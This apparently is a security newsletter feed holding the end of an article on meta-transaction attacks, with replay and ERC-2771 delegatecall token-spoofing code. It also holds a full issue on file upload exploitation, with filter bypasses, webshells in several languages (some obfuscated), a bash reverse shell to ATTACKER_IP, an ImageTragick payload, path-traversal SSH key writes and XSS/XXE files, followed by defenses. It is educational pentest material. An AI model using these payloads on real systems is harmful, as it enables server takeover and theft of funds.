&lt;summary&gt;&lt;strong&gt;Click to expand: Replay Attack Demonstration&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

/**
 * Demonstration of cross-relayer replay attack
 * @notice This shows why nonces are needed
 */
async function replayAttack() {
    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);

    // User signs meta-transaction for RelayerA
    const userWallet = new ethers.Wallet(&apos;USER_PRIVATE_KEY&apos;, provider);
    const forwarderAddress = &apos;0x...&apos;;

    // User creates a signed request
    // Encode deposit() function call
    const recipientInterface = new ethers.Interface([&apos;function deposit() payable&apos;]);
    const depositData = recipientInterface.encodeFunctionData(&apos;deposit&apos;);

    const request = {
        from: userWallet.address,
        to: recipientAddress,  // Recipient contract
        value: 0,  // No ETH transferred in the meta-tx itself
        gas: 500000,
        nonce: 5,  // Current nonce
        data: depositData  // Encoded deposit() call
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: 31337,
        verifyingContract: forwarderAddress
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;User signed meta-transaction&apos;);
    console.log(&apos;Request:&apos;, request);
    console.log(&apos;Signature:&apos;, signature);

    // Attacker intercepts the signed message
    // ATTACK: Try to submit via different relayer

    const relayerAWallet = new ethers.Wallet(&apos;RELAYER_A_KEY&apos;, provider);
    const relayerBWallet = new ethers.Wallet(&apos;RELAYER_B_KEY&apos;, provider);

    const forwarderABI = [
        &apos;function execute((address,address,uint256,uint256,uint256,uint256,bytes),bytes) returns (bool, bytes)&apos;
    ];

    const forwarderA = new ethers.Contract(forwarderAddress, forwarderABI, relayerAWallet);
    const forwarderB = new ethers.Contract(forwarderAddress, forwarderABI, relayerBWallet);

    // RelayerA submits first
    console.log(&apos;\nRelayerA submitting...&apos;);
    const txA = await forwarderA.execute(request, signature);
    await txA.wait();
    console.log(&apos;RelayerA succeeded:&apos;, txA.hash);

    // ATTACK: RelayerB tries to replay the same signature
    console.log(&apos;\nAttacker (RelayerB) trying to replay...&apos;);
    try {
        const txB = await forwarderB.execute(request, signature);
        await txB.wait();
        console.log(&apos;VULNERABILITY: Replay succeeded!&apos;);
    } catch (error) {
        // FIX: With proper nonce management, this should fail
        console.log(&apos;FIX: Replay prevented:&apos;, error.message);
        console.log(&apos;Reason: Nonce was incremented after first execution&apos;);
    }
}
```

&lt;/details&gt;

The forwarder&apos;s nonce management prevents this attack. After Relayer A submits the transaction, the nonce increments from 5 to 6. When Relayer B tries to submit the same signature (with nonce 5), verification fails because the expected nonce is now 6.

### Attack: Nonce Manipulation

What if an attacker can get a user to sign multiple meta-transactions with non-sequential nonces? They could selectively submit them out of order.

```javascript
// User signs three meta-transactions
const tx1 = { ...request, nonce: 10 };  // Deposit 1 ETH
const tx2 = { ...request, nonce: 11 };  // Withdraw 0.5 ETH
const tx3 = { ...request, nonce: 12 };  // Withdraw 0.5 ETH

// User expects order: deposit, withdraw, withdraw
// Attacker submits only tx1, skipping tx2 and tx3
// Or attacker delays tx1 and user&apos;s balance isn&apos;t updated when tx2 executes
```

The forwarder enforces sequential nonces, but the attacker can still cause denial of service by not submitting transactions. The user must trust the relayer to submit transactions in the order they were signed.

More sophisticated systems use a &quot;queue&quot; nonce system where multiple transactions can be submitted in parallel with dependency chains, but this increases complexity.

### Attack: Recipient Contract Confusion

Using `msg.sender` instead of `_msgSender()` in recipient contracts creates critical vulnerabilities:

```solidity
// ❌ VULNERABLE: Checks relayer&apos;s balance, not user&apos;s
require(balances[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

// ✅ SECURE: Checks original user&apos;s balance
require(balances[_msgSender()] &gt;= amount, &quot;Insufficient balance&quot;);
```

**Impact**: User funds become inaccessible, or worse, relayer can access user balances. Audit every function in recipient contracts when retrofitting for meta-transaction support.

### Attack: ERC-2771 + Delegatecall Vulnerability

In December 2023, [OpenZeppelin disclosed a vulnerability](https://www.openzeppelin.com/news/arbitrary-address-spoofing-vulnerability-erc2771context-multicall-public-disclosure) affecting recipient contracts that combine ERC-2771 with Multicall patterns using `delegatecall`. The vulnerability exists entirely in the recipient contract, not the forwarder. An attacker simply sends their own valid meta-transaction with malicious calldata to impersonate any address. No signature interception required.

**Why It Works**: The root cause is a mismatch in how `delegatecall` handles `msg.sender` vs `msg.data`:

| Property | Behavior in delegatecall |
|----------|--------------------------|
| `msg.sender` | **Preserved** (still the forwarder) |
| `msg.data` | **Changed** to the provided calldata |

The `_msgSender()` function checks `msg.sender` to verify the call came from the trusted forwarder, but then reads the address from `msg.data`. Since `delegatecall` preserves `msg.sender` but changes `msg.data`, an attacker can pass the security check while providing a forged address.

```solidity
// VULNERABILITY: ERC-2771 + Multicall with delegatecall
contract VulnerableContract is ERC2771Context {
    // Standard ERC-2771 _msgSender() implementation
    function _msgSender() internal view override returns (address) {
        // ① This check passes because delegatecall preserves msg.sender
        if (isTrustedForwarder(msg.sender)) {
            // ② But msg.data is now the attacker-controlled subcall data
            return address(bytes20(msg.data[msg.data.length - 20:]));
        }
        return msg.sender;
    }

    // VULNERABILITY: Multicall with delegatecall
    function multicall(bytes[] calldata data) external {
        for (uint i = 0; i &lt; data.length; i++) {
            // delegatecall changes msg.data to data[i]
            (bool success, ) = address(this).delegatecall(data[i]);
            require(success, &quot;Multicall failed&quot;);
        }
    }
}
```

**The Attack Step-by-Step**:

1. Attacker creates their own valid meta-transaction (no signature interception needed)
2. The meta-transaction calls `multicall()` with malicious subcall data
3. The malicious subcall has a victim&apos;s address appended at the end

```
Original calldata from forwarder:
┌────────────────────────────────────────────────────┐
│ multicall(data[]) │  ...  │ ATTACKER_ADDR (20 bytes)│
└────────────────────────────────────────────────────┘

Inside delegatecall, msg.data becomes data[i]:
┌─────────────────────────────────────────────────┐
│ transfer(to, amount) │ VICTIM_ADDR (20 bytes)   │
└─────────────────────────────────────────────────┘
                        ↑ _msgSender() reads THIS
```

**Concrete Example**:

```javascript
// Attacker wants to steal tokens from victim
const victimAddress = &quot;0xVICTIM...&quot;;
const attackerAddress = &quot;0xATTACKER...&quot;;

// Craft malicious subcall with victim address appended
const maliciousCall = ethers.solidityPacked(
    [&apos;bytes&apos;, &apos;address&apos;],
    [
        // Function call: transfer tokens to attacker
        contract.interface.encodeFunctionData(&apos;transfer&apos;, [attackerAddress, 1000]),
        // Forged sender address
        victimAddress
    ]
);

// Attacker signs their OWN meta-transaction
const request = {
    from: attackerAddress,
    to: vulnerableContract,
    data: contract.interface.encodeFunctionData(&apos;multicall&apos;, [[maliciousCall]])
};

// Result: Contract transfers tokens FROM victim TO attacker
// The victim never signed anything
```

This vulnerability demonstrates why production systems should use battle-tested forwarder implementations like [`ERC2771Forwarder`](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol) or [GSN](https://docs.opengsn.org/) rather than minimal custom implementations.

## Key Takeaways

Meta-transactions enable gasless UX but introduce significant security complexity. Here&apos;s a comparison of the trade-offs:

| Aspect | Standard Transaction | Meta-Transaction |
|--------|---------------------|------------------|
| **Gas Payment** | User pays | Relayer pays |
| **UX Barrier** | Requires ETH | No ETH needed |
| **Signature Type** | Transaction signature | Message signature (EIP-712) |
| **Replay Protection** | Account nonce (protocol-level) | Contract nonce (application-level) |
| **Trust Model** | Trustless | Trust relayer for submission |
| **Front-Running Risk** | Public mempool | Relayer can front-run |
| **Censorship Risk** | Network-level only | Relayer can censor |
| **Implementation Complexity** | Simple | Complex (forwarder + recipient) |
| **Audit Surface** | Standard | Larger (nonce, signature, forwarding) |

**Security Checklist for Meta-Transaction Implementations:**

- [ ] Forwarder uses per-user nonces for replay protection
- [ ] Nonces incremented before external calls (checks-effects-interactions)
- [ ] EIP-712 domain includes `chainId` to prevent cross-chain replay (best practice)
- [ ] Deadline parameter enforced to prevent indefinite delays
- [ ] Recipient contracts use `_msgSender()` not `msg.sender`
- [ ] All recipient functions audited for proper sender extraction
- [ ] Signature verification uses EIP-712 typed data (not raw message signing)
- [ ] Gas limits specified in forward requests to prevent griefing
- [ ] **Production-ready forwarder** used (e.g., OpenZeppelin ERC2771Forwarder, not MinimalForwarder)
- [ ] Single trusted forwarder per recipient (not multiple forwarders)
- [ ] **No `delegatecall` in ERC-2771 contracts** or carefully audited if required
- [ ] Multicall patterns don&apos;t use `delegatecall` with user-provided data
- [ ] Application-level checks prevent relayer front-running
- [ ] Relayer service has rate limiting and abuse prevention
- [ ] Users have fallback mechanism if relayer censors them

**When to Use Meta-Transactions:**

Use meta-transactions when onboarding UX is more important than trustlessness. They work well for:
- New user onboarding (free first transactions)
- Sponsored actions (protocol pays gas for specific operations)
- Mobile dApps where users don&apos;t want to manage gas
- Enterprise applications with predictable usage patterns

Avoid meta-transactions when:
- Users are already crypto-native (they have ETH and wallets)
- Trust in relayer is a concern (adversarial environments)
- Transaction ordering is mission-critical (DeFi trading)
- You can&apos;t audit recipient contracts for proper `_msgSender()` usage

**Relayer Centralization Concerns:**

A single relayer service is a point of failure and trust. Decentralized alternatives include:
- **[Gas Station Network (GSN)](https://docs.opengsn.org/)**: Decentralized relayer network with economic incentives
- **[Biconomy](https://docs.biconomy.io/)**: Multi-relayer infrastructure with SLAs
- **Fallback mechanisms**: Allow users to submit transactions directly if relayer fails

The relayer must be monitored for availability, performance, and honest behavior. Service level agreements (SLAs) can help, but ultimately the relayer has significant power over user experience.

## Additional Resources

**Standards and Specifications:**
- [EIP-2771: Secure Protocol for Native Meta-Transactions](https://eips.ethereum.org/EIPS/eip-2771)
- [EIP-712: Typed Structured Data Hashing and Signing](https://eips.ethereum.org/EIPS/eip-712)
- [EIP-2612: Permit Extension for ERC-20](https://eips.ethereum.org/EIPS/eip-2612)

**Implementation Libraries:**
- [OpenZeppelin ERC2771Forwarder](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol) - Production-ready forwarder with deadline enforcement and batch processing (v5.x)
- [OpenZeppelin MinimalForwarder](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v4.9.0/contracts/metatx/MinimalForwarder.sol) - Minimal implementation for testing (v4.x, deprecated in v5)
- [OpenZeppelin ERC2771Context](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Context.sol) - Helper for recipient contracts

**Meta-Transaction Infrastructure:**
- [Biconomy Documentation](https://docs.biconomy.io/) - Production meta-transaction relayer service
- [Gas Station Network (GSN)](https://docs.opengsn.org/) - Decentralized relayer network
- [Gelato Relay](https://docs.gelato.network/developer-services/relay) - Another relayer service option

**Security Research:**
- [Meta-Transaction Security Considerations](https://docs.openzeppelin.com/contracts/5.x/api/metatx) - OpenZeppelin security docs (v5.x)
- [EIP-2771 Security Audit](https://blog.openzeppelin.com/eip-2771-secure-protocol-for-native-meta-transactions/) - Audit findings and recommendations
- [Arbitrary Address Spoofing: ERC2771Context Multicall Vulnerability](https://www.openzeppelin.com/news/arbitrary-address-spoofing-vulnerability-erc2771context-multicall-public-disclosure) - Critical vulnerability disclosure (December 2023)
- [ERC-2771 Delegatecall Vulnerability](https://docs.gelato.network/web3-services/relay/security-considerations/erc-2771-delegatecall-vulnerability) - Gelato&apos;s security considerations

**Tools:**
- [Foundry](https://getfoundry.sh/) - For testing meta-transaction flows locally
- [Tenderly](https://tenderly.co/) - Transaction simulation and debugging
- [Ethers.js v6 EIP-712 Utilities](https://docs.ethers.org/v6/api/providers/#Signer-signTypedData) - For signing typed data</content:encoded><author>Ruben Santos</author></item><item><title>File Upload Vulnerabilities: From Filter Bypass to Full System Compromise</title><link>https://www.kayssel.com/newsletter/issue-25</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-25</guid><description>How attackers turn innocent file uploads into webshells, arbitrary code execution, and complete server takeovers</description><pubDate>Sun, 23 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

When I was learning web application security and grinding through CTFs (way more than I do now), file upload challenges were everywhere. Every platform had them. TryHackMe, HackTheBox, PortSwigger Labs. And honestly? I loved them.

There&apos;s something satisfying about bypassing a filter that thinks it&apos;s smart. Double extensions, null bytes, polyglot files, magic byte manipulation. Each technique felt like a small puzzle. Upload a webshell, get command execution, game over.

But here&apos;s what makes file uploads so interesting: they&apos;re not just CTF tricks. File upload vulnerabilities are one of the most common paths to RCE in real-world applications. Profile picture uploads, document submission forms, support ticket attachments. Developers implement basic checks, think they&apos;re safe, and move on. Meanwhile, the upload directory is sitting there waiting to execute arbitrary code.

The attack surface is massive. Extension filters, MIME type validation, content checks, magic bytes, storage paths, server configuration. Every layer is an opportunity for bypass. And when you stack techniques together, even well-intentioned defenses fall apart.

The worst part? Developers often focus on preventing malicious file types but forget about where files are stored, how they&apos;re served, or whether the web server will execute them. That&apos;s how innocent profile picture uploads turn into full system compromise.

In this issue, we&apos;ll cover:
- Common file upload vulnerabilities and misconfigurations
- Techniques to bypass extension, MIME type, and content filters
- Weaponizing uploads for webshells and RCE
- Path traversal and file overwrite attacks
- Polyglot files and magic byte manipulation
- Defense strategies that actually work

If you&apos;re pentesting web apps or building upload features, this is essential knowledge.

Let&apos;s break some filters 👇

## 🎯 Why File Uploads Are Dangerous

File upload functionality seems simple. User sends a file, server stores it. But that flow has countless security pitfalls:

**Server-Side Code Execution**: If an attacker can upload executable code (PHP, JSP, ASPX, etc.) and the server runs it, game over. Full RCE.

**Stored XSS**: Upload an HTML or SVG file with embedded JavaScript, and when another user views it, the script executes in their browser.

**Path Traversal**: Manipulate the filename to overwrite critical files like `/etc/passwd`, application configs, or SSH keys.

**DoS via Large Files**: Upload massive files to exhaust disk space or memory.

**Phishing and Social Engineering**: Upload malicious files disguised as legitimate documents for other users to download.

**XXE and Other Parser Bugs**: As we covered in [Issue 22](https://www.kayssel.com/newsletter/issue-22/), XML-based file formats (DOCX, SVG, etc.) can carry XXE payloads.

The most common and impactful? **Remote Code Execution via webshell uploads**. That&apos;s what we&apos;ll focus on here.

## 🔍 Finding File Upload Vulnerabilities

Not every file upload is exploitable, but here&apos;s where to look:

**Profile Pictures and Avatars**: Classic target. Often limited validation, publicly accessible storage.

**Document Uploads**: Resume submission forms, support ticket attachments, invoice uploads. These tend to accept various formats and may be processed server-side.

**File Sharing and Collaboration Tools**: Cloud storage, shared drives, wiki attachments. High-value targets because files are often executable or served with minimal restriction.

**CMS and Admin Panels**: WordPress, Joomla, Drupal media libraries. If you compromise an admin account, file uploads are your fast track to RCE.

**API Endpoints**: Mobile app image uploads, multipart form data endpoints. Sometimes these skip frontend validation entirely.

Look for:
- File upload forms (profile pics, attachments, etc.)
- Multipart form data in requests
- Endpoints that return uploaded file URLs
- Directories like `/uploads/`, `/media/`, `/files/`, `/static/`

## 🧨 Bypassing Extension Filters

The most basic defense is a blacklist or whitelist of allowed file extensions. Attackers bypass these constantly.

### Blacklist Bypass

If the app blocks `.php`, `.jsp`, `.asp`, try:

**Double extensions**:
```
shell.php.jpg
shell.jpg.php
```

Some parsers read the last extension, others read the first. If the server reads left to right but the validation reads right to left, you win.

**Case variation**:
```
shell.PhP
shell.pHp
```

If the filter is case-sensitive, this works.

**Null byte injection** (older systems):
```
shell.php%00.jpg
```

The null byte (`%00`) terminates the string in some languages, so the server sees `shell.php` but the filter sees `shell.php.jpg`.

**Alternative executable extensions**:
```
shell.php3
shell.php4
shell.php5
shell.phtml
shell.phar
```

Apache might execute `.phtml` or `.php5` as PHP depending on configuration.

**Add extra dots or spaces**:
```
shell.php.
shell.php%20
shell.php....jpg
```

Some filesystems strip trailing dots or spaces, turning `shell.php.` into `shell.php` after validation.

### Whitelist Bypass

If only `.jpg`, `.png`, `.gif` are allowed:

**Upload a polyglot file** (more on this below) that&apos;s both a valid image and executable code.

**Use allowed extensions with server misconfiguration**: Upload `shell.jpg` but configure the server (via `.htaccess` if writable) to execute `.jpg` as PHP:

```apache
AddType application/x-httpd-php .jpg
```

If you can upload `.htaccess` files, you control execution.

**Content-Type manipulation**: The client sends a `Content-Type` header. Change it to match expectations:

```http
Content-Type: image/jpeg
```

Even if the file is actually a PHP script, the server might trust the header.

## 🎭 Bypassing MIME Type Validation

Some apps validate the `Content-Type` header sent by the client. This is trivial to bypass.

**Intercept the upload request with Burp Suite and modify the header**:

```http
POST /upload HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;shell.php&quot;
Content-Type: image/jpeg

&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;
------WebKitFormBoundary--
```

The server sees `Content-Type: image/jpeg` and allows the upload, but the file is a PHP webshell.

**Key point**: Never trust client-controlled headers. Always validate file content server-side.

## 🧬 Magic Bytes and File Signature Bypass

Smarter defenses check the file&apos;s magic bytes (the first few bytes that identify file types). For example:

- **JPEG**: `FF D8 FF`
- **PNG**: `89 50 4E 47`
- **GIF**: `47 49 46 38`
- **PDF**: `25 50 44 46`

If the app checks magic bytes, prepend them to your payload.

&lt;details&gt;
&lt;summary&gt;Create a PHP webshell disguised as a JPEG:&lt;/summary&gt;

```bash
echo -e &apos;\xFF\xD8\xFF\xE0&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&apos; &gt; shell.php.jpg
```

The file starts with `FF D8 FF E0` (JPEG magic bytes), passes the check, but PHP ignores the binary junk and executes the code.

&lt;/details&gt;

**Polyglot Files**: Files that are valid in multiple formats simultaneously. For example, a GIF that&apos;s also valid JavaScript:

```javascript
GIF89a/*&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;*/=1;
```

When parsed as GIF, it&apos;s valid. When parsed as PHP, it executes. These are gold for bypassing multi-layered validation.

Tools like **[Mitra](https://github.com/corkami/mitra)** (polyglot file generator) and **[ImageTragick PoCs](https://imagetragick.com/)** can help craft polyglot files.

## 🚀 Weaponizing File Uploads for RCE

Once you&apos;ve bypassed filters and uploaded executable code, you need to trigger execution.

### Classic Webshells

A minimal PHP webshell:

```php
&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;
```

Upload this as `shell.php`, access `https://target.com/uploads/shell.php?cmd=whoami`, and you&apos;ve got command execution.

**One-liners for different languages**:

**PHP**:
```php
&lt;?php system($_GET[&apos;c&apos;]); ?&gt;
```

**JSP**:
```jsp
&lt;%@ page import=&quot;java.io.*&quot; %&gt;
&lt;%
Process p = Runtime.getRuntime().exec(request.getParameter(&quot;c&quot;));
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line; while((line = br.readLine()) != null) { out.println(line); }
%&gt;
```

**ASPX (C#)**:
```aspx
&lt;%@ Page Language=&quot;C#&quot; %&gt;
&lt;%@ Import Namespace=&quot;System.Diagnostics&quot; %&gt;
&lt;%@ Import Namespace=&quot;System.IO&quot; %&gt;
&lt;%
Process p = new Process();
p.StartInfo.FileName = &quot;cmd.exe&quot;;
p.StartInfo.Arguments = &quot;/c &quot; + Request[&quot;c&quot;];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
%&gt;
```

**Python CGI** (if server executes `.py` files as CGI):
```python
#!/usr/bin/env python3
import os, cgi
form = cgi.FieldStorage()
os.system(form.getvalue(&apos;c&apos;, &apos;&apos;))
```

### Upgrading to a Reverse Shell

Once you have command execution, upgrade to an interactive reverse shell:

```bash
# On your attacker machine
nc -lvnp 4444

# Via the webshell
https://target.com/uploads/shell.php?cmd=bash -c &apos;bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1&apos;
```

Or use a more reliable reverse shell like [PentestMonkey&apos;s PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell).

### Obfuscating Webshells

If the app scans for keywords like `system`, `exec`, `eval`, obfuscate:

```php
&lt;?php
$a = &apos;sys&apos;.&apos;tem&apos;;
$a($_GET[&apos;c&apos;]);
?&gt;
```

Or use base64 encoding:

```php
&lt;?php
eval(base64_decode(&apos;c3lzdGVtKCRfR0VUWydjJ10pOw==&apos;));
?&gt;
```

Decode that base64: `system($_GET[&apos;c&apos;]);`

## 📂 Path Traversal in File Uploads

If you can control the uploaded filename, try path traversal to overwrite critical files.

**Example**: Overwrite SSH authorized keys:

```http
POST /upload HTTP/1.1

------WebKitFormBoundary
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;../../root/.ssh/authorized_keys&quot;
Content-Type: text/plain

ssh-rsa AAAAB3... attacker@evil
------WebKitFormBoundary--
```

If the server doesn&apos;t sanitize the filename, this writes your SSH public key to `/root/.ssh/authorized_keys`, giving you root SSH access.

**Other targets**:
- `/etc/passwd` (if writable, rare but possible)
- Application configuration files
- Cron jobs (`/etc/cron.d/`)
- Web server configs (`.htaccess`, `web.config`)

**Zip Slip ([CVE-2018-1002200](https://nvd.nist.gov/vuln/detail/CVE-2018-1002200))**: If the app extracts uploaded ZIP files without sanitizing paths, you can include files with traversal paths:

```
malicious.zip
  ├── ../../../etc/cron.d/backdoor
```

When extracted, this writes to `/etc/cron.d/backdoor`, giving you scheduled code execution.

## 🖼️ Image-Based Exploits

Uploading images seems safe, right? Not always.

### ImageTragick (CVE-2016-3714)

ImageMagick, a widely used image processing library, had a critical RCE vulnerability. If the app uses ImageMagick to process uploads, you can exploit it with a malicious image:

```
push graphic-context
viewbox 0 0 640 480
fill &apos;url(https://attacker.com/shell.php|ls &quot;-la&quot;)&apos;
pop graphic-context
```

Save this as `exploit.mvg`, upload it, and ImageMagick executes the command.

**Status**: Patched in 2016 but legacy systems still vulnerable.

### SVG XSS and XXE

SVG files are XML-based. You can embed JavaScript for XSS:

```xml
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;script&gt;alert(document.domain)&lt;/script&gt;
&lt;/svg&gt;
```

Or XXE payloads (as covered in [Issue 22](https://www.kayssel.com/newsletter/issue-22/)):

```xml
&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;
&lt;!DOCTYPE svg [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;text&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;
```

If the app renders or processes SVGs server-side, you can leak files or achieve XSS.

### EXIF Metadata Injection

Images contain EXIF metadata. Some apps display this metadata to users. Inject XSS payloads:

```bash
exiftool -Comment=&apos;&lt;script&gt;alert(1)&lt;/script&gt;&apos; image.jpg
```

If the app displays the comment field without sanitizing, you&apos;ve got stored XSS.

## 🛡️ Real-World CVEs

**[CVE-2021-24145](https://nvd.nist.gov/vuln/detail/CVE-2021-24145) (WordPress Modern Events Calendar)**: Arbitrary file upload vulnerability in versions before 5.16.5. Attackers could bypass validation by setting `Content-Type: text/csv` while uploading PHP files. Required administrator privileges but led to RCE. CVSS: 7.2 HIGH.

**[CVE-2020-9484](https://nvd.nist.gov/vuln/detail/CVE-2020-9484) (Apache Tomcat)**: Deserialization of untrusted data vulnerability exploitable when PersistenceManager with FileStore is configured. Attackers with control over file names and contents on the server could achieve RCE via crafted session files. Affected Tomcat 7.0.0-7.0.103, 8.5.0-8.5.54, 9.0.0.M1-9.0.34, and 10.0.0.M1-10.0.0.M4. CVSS: 7.0 HIGH.

**[CVE-2019-8943](https://nvd.nist.gov/vuln/detail/CVE-2019-8943) (WordPress Core)**: Path traversal vulnerability in the `wp_crop_image()` function affecting WordPress through version 5.0.3. Authenticated attackers with image cropping privileges could write files to arbitrary directories using filenames with double extensions and `../` sequences (e.g., `image.jpg?/../../shell.php`), leading to RCE. CVSS: 6.5 MEDIUM.

**[CVE-2018-1002200](https://nvd.nist.gov/vuln/detail/CVE-2018-1002200) (Zip Slip)**: Directory traversal vulnerability in plexus-archiver before version 3.6.0. Attackers could craft ZIP archives with `../` sequences in file paths, allowing file writes to arbitrary locations during extraction. Also known as &quot;Zip Slip&quot;, this vulnerability affected numerous Java applications using the library. CVSS: 5.5 MEDIUM.

## 🛠️ Tools of the Trade

**[Burp Suite](https://portswigger.net/burp)**: Essential for intercepting and modifying upload requests. Use Repeater to test different payloads.

**[Upload Scanner (Burp Extension)](https://github.com/modzero/mod0BurpUploadScanner)**: Automates testing for file upload vulnerabilities including extension, MIME type, and content validation bypasses.

**[Fuxploider](https://github.com/almandin/fuxploider)**: Automated file upload vulnerability scanner. Tests various bypass techniques and generates reports.

**[exiftool](https://exiftool.org/)**: Manipulate image metadata for EXIF injection attacks.

**[Mitra](https://github.com/corkami/mitra)**: Generate polyglot files (parasites, polymocks, crypto-polyglots) valid in multiple formats (PNG/JPEG/PDF/etc).

**[ImageTragick PoCs](https://github.com/ImageTragick/PoCs)**: Collection of ImageTragick exploit proof-of-concepts for CVE-2016-3714.

**Webshell Collections**:
- **[SecLists Webshells](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells)**: Large collection of webshells in various languages
- **[PayloadsAllTheThings - File Upload](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files)**: Comprehensive collection of file upload bypass techniques, payloads, and exploitation methods

## 🧪 Labs &amp; Practice

**PortSwigger Web Security Academy**:
- [Web shell upload via extension blacklist bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass)
- [Web shell upload via Content-Type restriction bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass)
- [Web shell upload via path traversal](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal)
- [Web shell upload via obfuscated file extension](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension)
- [Remote code execution via polyglot web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload)

Main resource: [https://portswigger.net/web-security/file-upload](https://portswigger.net/web-security/file-upload)

**TryHackMe**:
- **[Upload Vulnerabilities](https://tryhackme.com/room/uploadvulns)**: Comprehensive room covering client-side filters, MIME validation, magic number validation, and more
- **[Overpass 2](https://tryhackme.com/room/overpass2hacked)**: Includes file upload exploitation for persistence

**Hack The Box**:
- **[Magic](https://app.hackthebox.com/machines/Magic)**: Medium-rated Linux box featuring SQL injection to bypass login and file upload bypass using double extensions (.php.jpg) and EXIF metadata injection to upload webshell
- **[Help](https://app.hackthebox.com/machines/Help)**: Medium-rated box exploiting HelpDeskZ file upload vulnerability allowing PHP reverse shell upload and execution

## 🔒 Defense and Detection

If you&apos;re defending against file upload attacks, here&apos;s what actually works:

### 1. Whitelist Allowed Extensions

Never use blacklists. Whitelist only the exact extensions you need:

```python
ALLOWED_EXTENSIONS = {&apos;png&apos;, &apos;jpg&apos;, &apos;jpeg&apos;, &apos;gif&apos;}

def allowed_file(filename):
    return &apos;.&apos; in filename and \
           filename.rsplit(&apos;.&apos;, 1)[1].lower() in ALLOWED_EXTENSIONS
```

### 2. Validate File Content, Not Just Extension

Check magic bytes server-side using Pillow:

```python
from PIL import Image

def validate_image(file):
    try:
        img = Image.open(file)
        return img.format.lower() in [&apos;png&apos;, &apos;jpeg&apos;, &apos;gif&apos;]
    except Exception:
        return False
```

### 3. Rename Uploaded Files

Never trust user-supplied filenames. Generate random names:

```python
import uuid
import os

def save_file(file):
    ext = file.filename.rsplit(&apos;.&apos;, 1)[1].lower()
    filename = f&quot;{uuid.uuid4()}.{ext}&quot;
    file.save(os.path.join(UPLOAD_FOLDER, filename))
```

### 4. Store Files Outside the Web Root

Don&apos;t store uploads in directories served directly by the web server. Store them outside the web root and serve via a separate script that sets proper headers:

```python
# Store in /var/app/uploads (not /var/www/html/uploads)
# Serve via /download/&lt;file_id&gt; endpoint with proper Content-Type
```

### 5. Disable Execution in Upload Directories

In Apache, add to `.htaccess` in upload directory:

```apache
&lt;FilesMatch &quot;.*&quot;&gt;
    SetHandler default-handler
&lt;/FilesMatch&gt;
```

In Nginx:

```nginx
location /uploads {
    location ~ \.php$ {
        return 403;
    }
}
```

### 6. Set Proper Content-Type Headers

When serving files, set `Content-Type` and `Content-Disposition` headers to prevent execution:

```python
return send_file(filepath,
                 mimetype=&apos;application/octet-stream&apos;,
                 as_attachment=True)
```

### 7. Scan Uploaded Files

Use antivirus or malware scanners like **ClamAV** to scan uploads before storing them.

### 8. Limit File Size

Prevent DoS via large files:

```python
app.config[&apos;MAX_CONTENT_LENGTH&apos;] = 16 * 1024 * 1024  # 16MB max
```

### 9. Implement Rate Limiting

Prevent abuse by limiting uploads per user/IP:

```python
from flask_limiter import Limiter

limiter = Limiter(app, key_func=get_remote_address)

@app.route(&apos;/upload&apos;, methods=[&apos;POST&apos;])
@limiter.limit(&quot;5 per minute&quot;)
def upload():
    # handle upload
```

### 10. Monitor and Log

Log all upload attempts with filenames, extensions, sizes, and user IDs. Alert on suspicious patterns like:
- Unusual extensions
- Rapid upload attempts
- Large file sizes
- Path traversal characters in filenames

## 🎯 Key Takeaways

- **File uploads are a high-value attack vector** leading directly to RCE in many cases
- **Extension filters are easily bypassed** using double extensions, null bytes, case variation, and alternative extensions
- **Never trust client-side validation** including MIME types and Content-Type headers
- **Magic byte checks can be defeated** with polyglot files and prepended signatures
- **Path traversal in filenames** can overwrite critical system files
